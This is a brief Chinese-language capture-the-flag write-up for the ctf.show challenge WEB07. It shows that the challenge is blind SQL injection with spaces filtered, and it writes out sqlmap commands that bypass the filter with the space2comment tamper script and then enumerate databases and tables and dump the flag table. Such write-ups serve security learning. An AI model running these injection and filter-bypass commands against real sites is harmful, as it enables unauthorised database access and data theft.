文章目录
WEB07
进入目录
可以发觉到本题考察的是sql盲注
尝试注入
经过测试,可以发现本题过滤了空格,在这里可以使用/**/
进行代替
又是空格绕过,之前刚做过的在CTFHUB上空格绕过题,具体详细就不再细说
直接操作吧
爆数据库
python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" --dbs --tamper "space2comment.py"
可以看到这里又六个库名,我们进入web7看看
爆表
python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" -D "web7" --tables --tamper "space2comment.py"
找到flag了!!!
爆数据库字段
python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" -D "web7" -T "flag" --dump --tamper "space2comment.py"
就是这么简单